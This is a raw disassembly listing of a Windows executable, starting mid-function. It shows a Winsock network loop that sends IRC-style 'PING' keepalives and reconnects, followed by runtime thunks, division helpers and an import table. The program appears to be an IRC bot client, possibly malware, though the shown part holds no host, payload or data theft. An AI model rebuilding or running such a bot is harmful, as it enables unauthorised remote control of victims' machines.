pop ecx
pop ecx
push 10h
push offset dword_41DA20
call sub_40ECEB
pop ecx
pop ecx
push 10h
push offset dword_41DA20
call sub_40ED6E
pop ecx
pop ecx
call sub_410422
mov dword_41EC00, eax
call sub_410422
mov dword_41EC04, eax
call sub_410422
mov dword_41EC08, eax
call sub_410422
mov dword_41EC0C, eax
push 104h
lea eax, [ebp+var_1120]
push eax
push 0
call dword_41708C ; GetModuleHandleA
push eax
call dword_417090 ; GetModuleFileNameA
test eax, eax
jnz short loc_416961
push offset byte_41DE00
push offset dword_41EAFC
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp loc_4169E1
; ---------------------------------------------------------------------------
loc_416961: ; CODE XREF: sub_4167F1+158�j
lea eax, [ebp+var_1120]
push eax
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_12F4], eax
jmp short loc_416983
; ---------------------------------------------------------------------------
loc_416976: ; CODE XREF: sub_4167F1:loc_4169DF�j
mov eax, [ebp+var_12F4]
dec eax
mov [ebp+var_12F4], eax
loc_416983: ; CODE XREF: sub_4167F1+183�j
cmp [ebp+var_12F4], 0
jnz short loc_41699F
push offset byte_41DE00
push offset dword_41EAFC
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_4169E1
; ---------------------------------------------------------------------------
loc_41699F: ; CODE XREF: sub_4167F1+199�j
mov eax, [ebp+var_12F4]
movsx eax, [ebp+eax+var_1121]
cmp eax, 5Ch
jnz short loc_4169DF
mov eax, [ebp+var_12F4]
lea eax, [ebp+eax+var_1120]
push eax
push offset dword_41EAFC
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
push offset dword_41EAFC
push offset dword_41EC10
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_4169E1
; ---------------------------------------------------------------------------
loc_4169DF: ; CODE XREF: sub_4167F1+1BF�j
jmp short loc_416976
; ---------------------------------------------------------------------------
loc_4169E1: ; CODE XREF: sub_4167F1+16B�j
; sub_4167F1+1AC�j ...
call sub_406E8E
lea eax, [ebp+var_12EC]
push eax
push 202h
call dword_417264 ; WSAStartup
loc_4169F8: ; CODE XREF: sub_4167F1+252�j
; sub_4167F1+2B6�j
push 0
push 0
push 0
call sub_40D366
add esp, 0Ch
call sub_409226
and dword ptr [ebp-1124h], 0
and [ebp+var_101C], 0
loc_416A19: ; CODE XREF: .data:00416AE2�j
mov [ebp+var_4], 1
loc_416A20: ; CODE XREF: sub_4167F1:loc_416A6F�j
; sub_4167F1+2CF�j
push 0EA60h
call sub_40CF25
push eax
call sub_40546E
pop ecx
pop ecx
test eax, eax
jnz short loc_416A71
cmp [ebp+var_101C], 19h
jnz short loc_416A45
and [ebp+var_4], 0
jmp short loc_4169F8
; ---------------------------------------------------------------------------
loc_416A45: ; CODE XREF: sub_4167F1+24C�j
cmp [ebp+var_101C], 14h
jnz short loc_416A62
call sub_410422
push eax
push offset aPing08x ; "PING :%08X"
call sub_40D6CB
pop ecx
pop ecx
jmp short loc_416A6F
; ---------------------------------------------------------------------------
loc_416A62: ; CODE XREF: sub_4167F1+25B�j
mov eax, [ebp+var_101C]
inc eax
mov [ebp+var_101C], eax
loc_416A6F: ; CODE XREF: sub_4167F1+26F�j
jmp short loc_416A20
; ---------------------------------------------------------------------------
loc_416A71: ; CODE XREF: sub_4167F1+243�j
push 1000h
lea eax, [ebp+var_1018]
push eax
call sub_40CF25
push eax
call sub_4053DC
add esp, 0Ch
mov [ebp-1124h], eax
cmp dword ptr [ebp-1124h], 0
jz short loc_416AA3
cmp dword ptr [ebp-1124h], 0FFFFFFFFh
jnz short loc_416AAC
loc_416AA3: ; CODE XREF: sub_4167F1+2A7�j
and [ebp+var_4], 0
jmp loc_4169F8
; ---------------------------------------------------------------------------
loc_416AAC: ; CODE XREF: sub_4167F1+2B0�j
and [ebp+var_101C], 0
lea eax, [ebp+var_1018]
push eax
call sub_40E943
pop ecx
jmp loc_416A20
sub_4167F1 endp
; ---------------------------------------------------------------------------
loc_416AC5: ; DATA XREF: .data:004172A8�o
push offset aLoop ; "loop"
push offset aMain ; "main"
push dword ptr [ebp-14h]
call sub_40332B
add esp, 0Ch
retn
; ---------------------------------------------------------------------------
loc_416ADB: ; DATA XREF: .data:004172AC�o
mov esp, [ebp-18h]
and dword ptr [ebp-4], 0
jmp loc_416A19
; ---------------------------------------------------------------------------
push offset aEntry ; "entry"
push offset aMain ; "main"
push dword ptr [ebp-14h]
call sub_40332B
add esp, 0Ch
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
or dword ptr [ebp-4], 0FFFFFFFFh
cmp dword_41DE08, 0
jz short loc_416B1E
push offset dword_41DD20
push offset dword_41DA80
call sub_40D4AB
pop ecx
pop ecx
loc_416B1E: ; CODE XREF: .data:00416B0B�j
call dword_417254 ; WSACleanup
push 0
call sub_416BFC ; exit
mov ecx, [ebp-10h]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B3A proc near ; CODE XREF: sub_401000+3C�p
; sub_4020C2+62�p ...
jmp dword_41712C
sub_416B3A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B40 proc near ; CODE XREF: sub_401146+7A�p
; sub_4017AA+E�p ...
jmp dword_4171BC
sub_416B40 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B46 proc near ; CODE XREF: sub_401244+85�p
; sub_4017AA+22�p ...
jmp dword_4171B8
sub_416B46 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B4C proc near ; CODE XREF: sub_401244+25�p
; sub_401244+4DE�p ...
jmp dword_4171B4
sub_416B4C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B52 proc near ; CODE XREF: sub_401244+1A�p
; sub_401981+18�p ...
jmp dword_4171B0
sub_416B52 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B58 proc near ; CODE XREF: sub_4017AA+5A�p
; sub_4024F3+88�p ...
jmp dword_4171AC
sub_416B58 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B5E proc near ; CODE XREF: sub_4018AF+9F�p
; sub_4055E5+231�p ...
jmp dword_4171A8
sub_416B5E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B64 proc near ; CODE XREF: sub_4018AF+3B�p
; sub_4018AF+5D�p ...
jmp dword_4171A4
sub_416B64 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B6A proc near ; CODE XREF: sub_401981+145�p
; sub_401981+158�p ...
jmp dword_4171A0
sub_416B6A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B70 proc near ; CODE XREF: sub_401D6E+A5�p
; sub_403260+4C�p ...
jmp dword_41719C
sub_416B70 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B76 proc near ; CODE XREF: sub_401E38+1AB�p
; sub_4020C2+1A6�p ...
jmp dword_417198
sub_416B76 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B7C proc near ; CODE XREF: sub_401E38+179�p
; sub_402698+24C�p ...
jmp dword_417194
sub_416B7C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B82 proc near ; CODE XREF: sub_401E38+9D�p
; sub_401E38+262�p ...
jmp dword_417190
sub_416B82 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B88 proc near ; CODE XREF: sub_401E38+42�p
; sub_4020C2+159�p ...
jmp dword_41718C
sub_416B88 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B90 proc near ; CODE XREF: sub_4020C2+2C1�p
; sub_41102F+94�p ...
jmp dword_417188
sub_416B90 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B96 proc near ; CODE XREF: sub_4020C2+198�p
; sub_4020C2+1BC�p ...
jmp dword_417184
sub_416B96 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B9C proc near ; CODE XREF: sub_4024F3+26�p
; sub_4024F3+46�p ...
jmp dword_417180
sub_416B9C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416BA2 proc near ; CODE XREF: sub_402698+160�p
; sub_40CA29+F6�p ...
jmp dword_41717C
sub_416BA2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416BA8 proc near ; CODE XREF: sub_402698+CC�p
; sub_402698+110�p ...
jmp dword_417178
sub_416BA8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416BAE proc near ; CODE XREF: sub_402698+4B�p
; sub_4083AD+3DF�p ...
jmp dword_417174
sub_416BAE endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_416BC0 proc near ; CODE XREF: sub_403DF3+8�p
; sub_40546E+8�p ...
arg_0 = byte ptr 4
push ecx
cmp eax, 1000h
lea ecx, [esp+4+arg_0]
jb short loc_416BE0
loc_416BCC: ; CODE XREF: sub_416BC0+1E�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_416BCC
loc_416BE0: ; CODE XREF: sub_416BC0+A�j
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_416BC0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416BF0 proc near ; CODE XREF: sub_4041B7+D�p
; sub_4041B7+28�p ...
jmp dword_417170
sub_416BF0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416BF6 proc near ; CODE XREF: sub_406041+67�p
jmp dword_41716C
sub_416BF6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416BFC proc near ; CODE XREF: sub_406E8E+2B3�p
; .data:00416B26�p
jmp dword_417168
sub_416BFC endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_416C10 proc near ; CODE XREF: sub_40821B+61�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
mov eax, [esp+4+arg_C]
or eax, eax
jnz short loc_416C31
mov ecx, [esp+4+arg_8]
mov eax, [esp+4+arg_4]
xor edx, edx
div ecx
mov eax, [esp+4+arg_0]
div ecx
mov eax, edx
xor edx, edx
jmp short loc_416C81
; ---------------------------------------------------------------------------
loc_416C31: ; CODE XREF: sub_416C10+7�j
mov ecx, eax
mov ebx, [esp+4+arg_8]
mov edx, [esp+4+arg_4]
mov eax, [esp+4+arg_0]
loc_416C3F: ; CODE XREF: sub_416C10+39�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_416C3F
div ebx
mov ecx, eax
mul [esp+4+arg_C]
xchg eax, ecx
mul [esp+4+arg_8]
add edx, ecx
jb short loc_416C6A
cmp edx, [esp+4+arg_4]
ja short loc_416C6A
jb short loc_416C72
cmp eax, [esp+4+arg_0]
jbe short loc_416C72
loc_416C6A: ; CODE XREF: sub_416C10+4A�j
; sub_416C10+50�j
sub eax, [esp+4+arg_8]
sbb edx, [esp+4+arg_C]
loc_416C72: ; CODE XREF: sub_416C10+52�j
; sub_416C10+58�j
sub eax, [esp+4+arg_0]
sbb edx, [esp+4+arg_4]
neg edx
neg eax
sbb edx, 0
loc_416C81: ; CODE XREF: sub_416C10+1F�j
pop ebx
retn 10h
sub_416C10 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_416C90 proc near ; CODE XREF: sub_40821B+30�p
; sub_40821B+3B�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
push esi
mov eax, [esp+8+arg_C]
or eax, eax
jnz short loc_416CB2
mov ecx, [esp+8+arg_8]
mov eax, [esp+8+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+8+arg_0]
div ecx
mov edx, ebx
jmp short loc_416CF3
; ---------------------------------------------------------------------------
loc_416CB2: ; CODE XREF: sub_416C90+8�j
mov ecx, eax
mov ebx, [esp+8+arg_8]
mov edx, [esp+8+arg_4]
mov eax, [esp+8+arg_0]
loc_416CC0: ; CODE XREF: sub_416C90+3A�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_416CC0
div ebx
mov esi, eax
mul [esp+8+arg_C]
mov ecx, eax
mov eax, [esp+8+arg_8]
mul esi
add edx, ecx
jb short loc_416CEE
cmp edx, [esp+8+arg_4]
ja short loc_416CEE
jb short loc_416CEF
cmp eax, [esp+8+arg_0]
jbe short loc_416CEF
loc_416CEE: ; CODE XREF: sub_416C90+4E�j
; sub_416C90+54�j
dec esi
loc_416CEF: ; CODE XREF: sub_416C90+56�j
; sub_416C90+5C�j
xor edx, edx
mov eax, esi
loc_416CF3: ; CODE XREF: sub_416C90+20�j
pop esi
pop ebx
retn 10h
sub_416C90 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416CF8 proc near ; CODE XREF: sub_4088FC+1FA�p
; sub_409226+5C�p ...
jmp dword_417164
sub_416CF8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416CFE proc near ; CODE XREF: sub_409226+55�p
; sub_4092A4+55�p ...
jmp dword_417160
sub_416CFE endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_416D10 proc near ; CODE XREF: sub_409226+42�p
; sub_4092A4+42�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push edi
push esi
push ebx
xor edi, edi
mov eax, [esp+0Ch+arg_4]
or eax, eax
jge short loc_416D31
inc edi
mov edx, [esp+0Ch+arg_0]
neg eax
neg edx
sbb eax, 0
mov [esp+0Ch+arg_4], eax
mov [esp+0Ch+arg_0], edx
loc_416D31: ; CODE XREF: sub_416D10+B�j
mov eax, [esp+0Ch+arg_C]
or eax, eax
jge short loc_416D4D
inc edi
mov edx, [esp+0Ch+arg_8]
neg eax
neg edx
sbb eax, 0
mov [esp+0Ch+arg_C], eax
mov [esp+0Ch+arg_8], edx
loc_416D4D: ; CODE XREF: sub_416D10+27�j
or eax, eax
jnz short loc_416D69
mov ecx, [esp+0Ch+arg_8]
mov eax, [esp+0Ch+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+0Ch+arg_0]
div ecx
mov edx, ebx
jmp short loc_416DAA
; ---------------------------------------------------------------------------
loc_416D69: ; CODE XREF: sub_416D10+3F�j
mov ebx, eax
mov ecx, [esp+0Ch+arg_8]
mov edx, [esp+0Ch+arg_4]
mov eax, [esp+0Ch+arg_0]
loc_416D77: ; CODE XREF: sub_416D10+71�j
shr ebx, 1
rcr ecx, 1
shr edx, 1
rcr eax, 1
or ebx, ebx
jnz short loc_416D77
div ecx
mov esi, eax
mul [esp+0Ch+arg_C]
mov ecx, eax
mov eax, [esp+0Ch+arg_8]
mul esi
add edx, ecx
jb short loc_416DA5
cmp edx, [esp+0Ch+arg_4]
ja short loc_416DA5
jb short loc_416DA6
cmp eax, [esp+0Ch+arg_0]
jbe short loc_416DA6
loc_416DA5: ; CODE XREF: sub_416D10+85�j
; sub_416D10+8B�j
dec esi
loc_416DA6: ; CODE XREF: sub_416D10+8D�j
; sub_416D10+93�j
xor edx, edx
mov eax, esi
loc_416DAA: ; CODE XREF: sub_416D10+57�j
dec edi
jnz short loc_416DB4
neg edx
neg eax
sbb edx, 0
loc_416DB4: ; CODE XREF: sub_416D10+9B�j
pop ebx
pop esi
pop edi
retn 10h
sub_416D10 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416DBA proc near ; DATA XREF: sub_4093B6+A�o
; sub_4094E6+A�o ...
jmp dword_41715C
sub_416DBA endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416DC0 proc near ; CODE XREF: sub_409479+41�p
; sub_4095A4+162�p
jmp dword_417158
sub_416DC0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416DC6 proc near ; CODE XREF: sub_4095A4+11B�p
jmp dword_417154
sub_416DC6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416DCC proc near ; CODE XREF: sub_409CB1+105�p
; sub_409CB1+114�p ...
jmp dword_417150
sub_416DCC endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416DD2 proc near ; CODE XREF: sub_409CB1+42�p
; sub_409CB1+88�p
jmp dword_41714C
sub_416DD2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416DD8 proc near ; CODE XREF: sub_409CB1+1A�p
; sub_409DD0+13B�p
jmp dword_417148
sub_416DD8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416DDE proc near ; CODE XREF: sub_40A2D2+13E�p
; sub_40A9CF+1F6�p ...
jmp dword_417144
sub_416DDE endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416DE4 proc near ; CODE XREF: sub_40A8AD+90�p
jmp dword_417140
sub_416DE4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416DEA proc near ; CODE XREF: sub_40A9CF+185C�p
jmp dword_41713C
sub_416DEA endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416DF0 proc near ; CODE XREF: sub_40D420+47�p
; sub_40D4AB+50�p ...
jmp dword_417138
sub_416DF0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416DF6 proc near ; CODE XREF: sub_40EF59+6B�p
; sub_40EF59+C1�p
jmp dword_417134
sub_416DF6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416DFC proc near ; CODE XREF: sub_40F040+52�p
; sub_40F040+A8�p
jmp dword_417130
sub_416DFC endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416E02 proc near ; CODE XREF: sub_40F040+1E�p
jmp dword_417128
sub_416E02 endp
; ---------------------------------------------------------------------------
loc_416E08: ; CODE XREF: .data:00416FE2�j
jmp dword_417124
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_416E10 proc near ; CODE XREF: sub_414EF4+5�p
push 0FFFFFFFFh
push eax
mov eax, large fs:0
push eax
mov eax, [esp+0Ch]
mov large fs:0, esp
mov [esp+0Ch], ebp
lea ebp, [esp+0Ch]
push eax
retn
sub_416E10 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416E30 proc near ; CODE XREF: sub_4048EF+4E�p
; sub_4048EF+2CF�p ...
jmp dword_4171F8
sub_416E30 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_416E40 proc near ; CODE XREF: sub_414EF4+EA�p
; sub_414EF4+1E2�p ...
arg_0 = dword ptr 4
push 0
push [esp+4+arg_0]
call sub_416EAF
retn 4
sub_416E40 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416E4E proc near ; CODE XREF: sub_414EF4+134�p
; sub_414EF4+2D8�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_4]
and [ebp+var_4], 0
test eax, eax
jz short loc_416EA0
mov ecx, [eax]
lea edx, [ebp+arg_4]
push edx
push offset dword_41DDA0
push eax
call dword ptr [ecx]
test eax, eax
jl short loc_416EA0
mov eax, [ebp+arg_4]
push esi
push [ebp+arg_8]
mov ecx, [eax]
push eax
call dword ptr [ecx+0Ch]
mov esi, eax
mov eax, [ebp+arg_4]
push eax
mov ecx, [eax]
call dword ptr [ecx+8]
test esi, esi
pop esi
jnz short loc_416EA0
lea eax, [ebp+var_4]
push eax
push 0
call dword_4171C8
test eax, eax
jz short loc_416EA0
and [ebp+var_4], 0
loc_416EA0: ; CODE XREF: sub_416E4E+D�j
; sub_416E4E+1F�j ...
push [ebp+var_4]
push [ebp+arg_0]
call sub_416EAF
leave
retn 0Ch
sub_416E4E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416EAF proc near ; CODE XREF: sub_416E40+6�p
; sub_416E4E+58�p
var_10 = byte ptr -10h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push 0
lea ecx, [ebp+var_10]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_416ED3
lea eax, [ebp+var_10]
push offset dword_4173B8
push eax
call sub_416FA2 ; _CxxThrowException
sub_416EAF endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_416ED3 proc near ; CODE XREF: sub_416EAF+11�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
mov eax, [esp+arg_0]
push esi
mov esi, ecx
and dword ptr [esi+0Ch], 0
mov [esi+4], eax
mov eax, [esp+4+arg_4]
mov dword ptr [esi], offset off_4172B4
test eax, eax
mov [esi+8], eax
jz short loc_416EFF
cmp [esp+4+arg_8], 0
jz short loc_416EFF
mov ecx, [eax]
push eax
call dword ptr [ecx+4]
loc_416EFF: ; CODE XREF: sub_416ED3+1D�j
; sub_416ED3+24�j
mov eax, esi
pop esi
retn 0Ch
sub_416ED3 endp
; =============== S U B R O U T I N E =======================================
sub_416F05 proc near ; DATA XREF: .data:off_4172B4�o
arg_0 = byte ptr 4
push esi
mov esi, ecx
call sub_416F4E
test [esp+4+arg_0], 1
jz short loc_416F1B
push esi
call sub_416DCC
pop ecx
loc_416F1B: ; CODE XREF: sub_416F05+D�j
mov eax, esi
pop esi
retn 4
sub_416F05 endp
; ---------------------------------------------------------------------------
mov eax, [esp+4]
push esi
mov esi, ecx
mov ecx, [eax+4]
mov [esi+4], ecx
mov eax, [eax+8]
and dword ptr [esi+0Ch], 0
mov [esi+8], eax
test eax, eax
mov dword ptr [esi], offset off_4172B4
jz short loc_416F48
mov ecx, [eax]
push eax
call dword ptr [ecx+4]
loc_416F48: ; CODE XREF: .data:00416F40�j
mov eax, esi
pop esi
retn 4
; =============== S U B R O U T I N E =======================================
sub_416F4E proc near ; CODE XREF: sub_416F05+3�p
; DATA XREF: .data:004173BC�o
push esi
mov esi, ecx
mov eax, [esi+8]
mov dword ptr [esi], offset off_4172B4
test eax, eax
jz short loc_416F64
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_416F64: ; CODE XREF: sub_416F4E+E�j
mov esi, [esi+0Ch]
test esi, esi
jz short loc_416F72
push esi
call dword_4170B0 ; LocalFree
loc_416F72: ; CODE XREF: sub_416F4E+1B�j
pop esi
retn
sub_416F4E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416F74 proc near ; CODE XREF: sub_401244+120�p
; sub_406E8E+DA�p ...
jmp dword_4171C0
sub_416F74 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416F7A proc near ; CODE XREF: sub_4020C2+113�p
; sub_4038BA+22F�p ...
jmp dword_417114
sub_416F7A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416F80 proc near ; CODE XREF: sub_402A32+CC�p
; sub_402A32+2B9�p ...
jmp dword_417118
sub_416F80 endp
; =============== S U B R O U T I N E =======================================
sub_416F86 proc near ; DATA XREF: .data:off_4172BC�o
arg_0 = byte ptr 4
push esi
mov esi, ecx
call sub_416FA8
test [esp+4+arg_0], 1
jz short loc_416F9C
push esi
call sub_416DCC
pop ecx
loc_416F9C: ; CODE XREF: sub_416F86+D�j
mov eax, esi
pop esi
retn 4
sub_416F86 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416FA2 proc near ; CODE XREF: sub_416EAF+1F�p
jmp dword_41711C
sub_416FA2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416FA8 proc near ; CODE XREF: sub_416F86+3�p
jmp dword_417120
sub_416FA8 endp
; ---------------------------------------------------------------------------
align 10h
lea ecx, [ebp-0A00h]
call sub_415B3F
retn
; ---------------------------------------------------------------------------
loc_416FBC: ; DATA XREF: .data:0041737C�o
lea ecx, [ebp-10h]
call sub_415B3F
retn
; ---------------------------------------------------------------------------
lea ecx, [ebp-0DF8h]
call sub_415B3F
retn
; ---------------------------------------------------------------------------
lea ecx, [ebp-0E14h]
call sub_415B3F
retn
; ---------------------------------------------------------------------------
loc_416FDD: ; DATA XREF: sub_414EF4�o
mov eax, offset dword_417350
jmp loc_416E08
; ---------------------------------------------------------------------------
align 4
dd 6 dup(0)
dword_417000 dd 77DD7F3Eh ; DATA XREF: sub_401000+C6�r
dword_417004 dd 77DD5C55h ; DATA XREF: sub_401000+11A�r
; sub_406C51+96�r
dword_417008 dd 77DD22EAh ; DATA XREF: sub_401000+65�r
; sub_406722+184�r ...
dword_41700C dd 77DD23D7h ; DATA XREF: sub_406722+1C3�r
; sub_4083AD+2DD�r ...
dword_417010 dd 77DD59F0h ; DATA XREF: sub_406C51+88�r
dword_417014 dd 77DD590Bh ; DATA XREF: sub_406C51+26�r
dword_417018 dd 77DDACABh ; DATA XREF: sub_4083AD+E6�r
dword_41701C dd 77DE042Eh ; DATA XREF: sub_4102AE+62�r
dword_417020 dd 77DE03D2h ; DATA XREF: sub_4102AE+27�r
; sub_4102AE+37�r ...
dword_417024 dd 77DDEBA2h ; DATA XREF: sub_4102AE+17�r
dword_417028 dd 77DD189Ah ; DATA XREF: sub_401000+136�r
; sub_406722+2F9�r ...
align 10h
dword_417030 dd 77E7C657h ; DATA XREF: sub_4083AD+11E�r
; sub_40D043+20B�r ...
dword_417034 dd 77E7513Ch ; DATA XREF: sub_408342+10�r
; sub_408342+4B�r
dword_417038 dd 77E705C5h ; DATA XREF: sub_406D47+41�r
dword_41703C dd 77E74672h ; DATA XREF: sub_406C51+6F�r
; sub_414EF4+8EE�r
dword_417040 dd 77E705B0h ; DATA XREF: sub_406B81+15�r
dword_417044 dd 77E7A837h ; DATA XREF: sub_406B81+47�r
; sub_406B81+95�r ...
dword_417048 dd 77E73CE2h ; DATA XREF: sub_406B81+6E�r
dword_41704C dd 77E7011Ah ; DATA XREF: sub_406B81+BC�r
dword_417050 dd 77E704FCh ; DATA XREF: sub_406A23+15�r
; sub_406AE7+15�r ...
dword_417054 dd 77E805D8h ; DATA XREF: sub_403BD3+B�r
; sub_403BD3+32�r ...
dword_417058 dd 77E7A5FDh ; DATA XREF: sub_403BD3+22�r
; sub_403BD3+4D�r ...
dword_41705C dd 77E75CB5h ; DATA XREF: sub_40332B+227�r
; sub_407148+18B�r ...
dword_417060 dd 77E6BD13h ; DATA XREF: sub_402A32+EC�r
; sub_406E8E+1FE�r
dword_417064 dd 77F5157Dh ; DATA XREF: sub_402A32+F6�r
; sub_409CB1+CF�r ...
dword_417068 dd 77E79D8Ch ; DATA XREF: sub_401D39+22�r
; sub_406D90+D3�r
dword_41706C dd 77E6CBF9h ; DATA XREF: sub_401981+4F�r
dword_417070 dd 77E7727Ah ; DATA XREF: sub_401981+9E�r
; sub_401981+D7�r
dword_417074 dd 77E79C90h ; DATA XREF: sub_401981+104�r
; sub_401981+111�r
dword_417078 dd 77E65F4Ch ; DATA XREF: sub_4083AD+FA�r
dword_41707C dd 77E61BB8h ; DATA XREF: sub_401981+1C6�r
; sub_406E8E+2A5�r
dword_417080 dd 77EB7624h ; DATA XREF: sub_401981+274�r
dword_417084 dd 77E7FF65h ; DATA XREF: sub_401981+2B3�r
dword_417088 dd 77E78B82h ; DATA XREF: sub_401981+37B�r
dword_41708C dd 77E79F93h ; DATA XREF: sub_401244+F2�r
; sub_40332B+1D0�r ...
dword_417090 dd 77E7A099h ; DATA XREF: sub_401244+F9�r
; sub_40332B+1D7�r ...
dword_417094 dd 77E706B7h ; DATA XREF: sub_401244+159�r
; sub_406041+193�r ...
dword_417098 dd 77E61A54h ; DATA XREF: sub_401244+21D�r
; sub_406509+91�r
dword_41709C dd 77E61BE6h ; DATA XREF: sub_401244+3C6�r
; sub_401244+4F4�r ...
dword_4170A0 dd 77E616B4h ; DATA XREF: sub_401244+439�r
; sub_406643+3B�r
dword_4170A4 dd 77E77963h ; DATA XREF: sub_401244+471�r
; sub_401244+4C1�r ...
dword_4170A8 dd 77E70396h ; DATA XREF: sub_401146+11�r
; sub_406E8E+22A�r ...
dword_4170AC dd 77E73628h ; DATA XREF: sub_401146+23�r
; sub_401E38+30�r ...
dword_4170B0 dd 77E79A45h ; DATA XREF: sub_416F4E+1E�r
dword_4170B4 dd 77E7AC37h ; DATA XREF: sub_40A1A7+106�r
dword_4170B8 dd 77E75090h ; DATA XREF: sub_40D74D+87�r
dword_4170BC dd 77E74D76h ; DATA XREF: sub_40D74D+4A�r
dword_4170C0 dd 77E77797h ; DATA XREF: sub_40D74D+33�r
dword_4170C4 dd 77E76C1Ah ; DATA XREF: sub_4083AD+33�r
dword_4170C8 dd 77E686CCh ; DATA XREF: sub_408E8E+4B�r
; sub_408F2E+134�r
dword_4170CC dd 77E6C0E3h ; DATA XREF: sub_408E8E+1A�r
; sub_408F2E+7F�r ...
dword_4170D0 dd 77E7751Ah ; DATA XREF: sub_409226:loc_40928E�r
; sub_4092A4:loc_409307�r ...
dword_4170D4 dd 77E6D75Bh ; DATA XREF: sub_409226+14�r
; sub_4092A4+14�r ...
dword_4170D8 dd 77E802FCh ; DATA XREF: sub_409226+A�r
; sub_4092A4+A�r ...
dword_4170DC dd 77E7176Ch ; DATA XREF: sub_4093B6+51�r
